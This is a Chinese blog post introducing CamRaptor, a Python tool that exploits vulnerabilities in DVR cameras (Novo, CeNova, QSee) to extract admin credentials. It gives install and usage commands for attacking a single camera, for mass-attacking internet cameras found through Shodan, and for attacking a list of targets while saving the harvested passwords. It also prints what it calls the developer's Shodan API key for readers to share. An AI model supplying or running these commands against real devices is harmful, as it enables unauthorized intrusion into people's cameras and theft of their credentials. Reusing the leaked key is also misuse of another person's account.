CamRaptor:针对DVR摄像头的漏洞利用工具

关于CamRaptor
CamRaptor是一款针对DVR摄像头的漏洞利用工具,它可以利用当前主流DVR摄像头中的多个安全漏洞,帮助广大研究人员获取目标DVR网络摄像头的管理员凭证。

功能介绍
能够利用当前主流DVR摄像头中的多个安全漏洞,例如Novo、CeNova和QSee等。
经过优化处理,支持以多线程的形式同时攻击列表中的多个目标DVR摄像头。
简单的命令行接口和API使用方法。

工具安装
由于CamRaptor使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装CamRaptor:
pip3 install git+https://github.com/EntySec/CamRaptor
工具基础使用
CamRaptor的使用非常简单,我们只需要在命令行终端中输入“camraptor”命令即可使用CamRaptor:

工具使用样例
攻击单个摄像头
下列命令可以攻击单个DVR摄像头:
camraptor -a 192.168.99.100
通过网络攻击远程DVR摄像头
接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:
camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!
从输入文件获取目标摄像头
我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:
camraptor -t -i cameras.txt -o passwords.txt
注意:此命令将会攻击cameras.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。

API使用
CamRaptor还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:
from camraptor import CamRaptor
基础函数
exploit(address):根据给定的地址针对单个目标执行漏洞利用攻击;

调用样例
攻击单个摄像头:
from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit(‘192.168.99.100’)
print(creds)

项目地址
CamRaptor:https://github.com/EntySec/CamRaptor

在这里插入图片描述

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值